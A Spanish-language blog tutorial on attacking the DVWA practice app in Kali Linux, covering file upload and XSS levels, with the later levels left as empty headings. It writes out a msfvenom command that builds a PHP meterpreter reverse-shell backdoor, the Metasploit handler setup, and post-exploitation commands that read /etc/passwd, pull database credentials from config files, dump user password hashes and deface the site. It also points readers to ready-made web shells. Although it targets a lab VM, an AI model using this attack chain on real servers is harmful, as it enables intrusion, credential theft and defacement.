Advertisement

header ads

ALGUNOS MÉTODOS DESARROLLADOS DE DVWA EN KALI LINUX PARTE 1 (File Upload, XSS)

Advertencia: “No todos los métodos los voy a publicar sobre todo los niveles de seguridad, porque es para que ustedes practiquen y no quiero hacer tanto spoiler para el mundo de la seguridad y cuando DVWA  se encarga de esto.”



Por las dudas de dejare mi post donde lo podes instalar. ” INSTALA EN UNA MAQUINA VIRTUAL DVWA “

Subir una SHELL

Existe muchos métodos que puedes usar en la clase baja la shell puede subir con .php sin problemas en la clase media usas “Burpsuite” para subir la shell en modo “.jpeg” “.png” y lo conviertes en .php.
Tienes un vídeo.


Me preguntarás donde puedo conseguir una shell? Busca en google “c99.php” De allí empece luego un amigo me compartió su shell personalizada, existe muchas web que te ofrece eso.
Te invito a que visites mi PASTEBIN
Pero no te preocupes puedes crear un backdoor y tener control de todo. Como?
 msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=4444 R > /root/Desktop/xvideos.php



Te cuento: La IP es la victima de la victima osea de la misma IP que controla el server dvwa y los puertos 4444 lo demás es la ubicación donde guardarlo.
Usando el método de subir una shell simplemente subimos el “backdoor” y ejecutamos la consola con lo siguiente.
service postgresql start
msfdb init
msfconsole
use exploit/multi/handler
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 192.168.1.5
set LPORT 4444
exploit
Y ahora buscamos el backdoor y lo ejecutamos la “URL”
¿Qué pasa? Tienes control a todo 3:)
Podemos colocar
shell
Podemos controlar y obtener información.
También podemos ser creativos dejando un mensajito.
echo "Hacked CreadPag.... Problem admin? security is bad Muaja muaja!!!" >xvideos.html
Veamos nuestra creatividad.
Podemos usar
tail /etc/passwd
Esto produce una lista perspectiva potencial para un ataque de fuerza bruta ssh.
 find /var/www/* -print | grep config
Aquí estoy queriendo encontrar todos los archivos de configuración en el directorio /var/www directory.
Explotar el archivo de configuración
 grep "db_" /var/www/html/dvwa/config/config.inc.php
Esto produce el nombre de la base de datos, nombre de usuario y la contraseña para iniciar sesión en la base de datos MySQL.
 echo "use dvwa; show tables;" | mysql -uroot -pdvwaPASSWORD
Este comando produce una lista de tablas de la base de datos DVWA.
 echo "use dvwa; desc users;" | mysql -uroot -pdvwaPASSWORD
Este comando se describen las columnas de la tabla de usuarios en la base de datos DVWA.
 echo "select user,password from dvwa.users;" | mysql -uroot -pdvwaPASSWORD
Este comando muestra la información de usuario y contraseña para cada usuario en la tabla dvwa.users.
Si quieres llevarlo publicar toda esa data en .html en el mismo server seria así.
  • echo “<pre>” >> /var/www/html/dvwa/hackable/uploads/xss.html
  • echo “select user,password from dvwa.users;” | mysql -uroot -pdvwaPASSWORD >> /var/www/html/dvwa/hackable/uploads/xss.html
  • echo “</pre>” >> /var/www/html/dvwa/hackable/uploads/xss.html
  • echo “<br>Tu nombre <br>” >> /var/www/html/dvwa/hackable/uploads/xss.html
  • date >> /var/www/html/dvwa/hackable/uploads/xss.html

RESULTADO

 http://192.168.1.5/dvwa/hackable/uploads/xss.html

Vulnerability: Stored Cross Site Scripting (XSS) || Reflected Cross Site Scripting (XSS)

Todo fácil lo básico.

AHORA NIVEL MEDIO

 


NIVEL ALTO


Otro método en el nivel medio.
En el nivel hard o difícil vamos a escribir “creadpag”
Ahora te paso la captura de los código por problema al blog no permite copiar los siguientes códigos.
 Bueno espero haberte ayudado. Y no te olvides de compartirlo, si veo que este post tiene gran visita voy por los métodos imposibles y más vulnerabilidades. Muchas gracias.

Publicar un comentario

0 Comentarios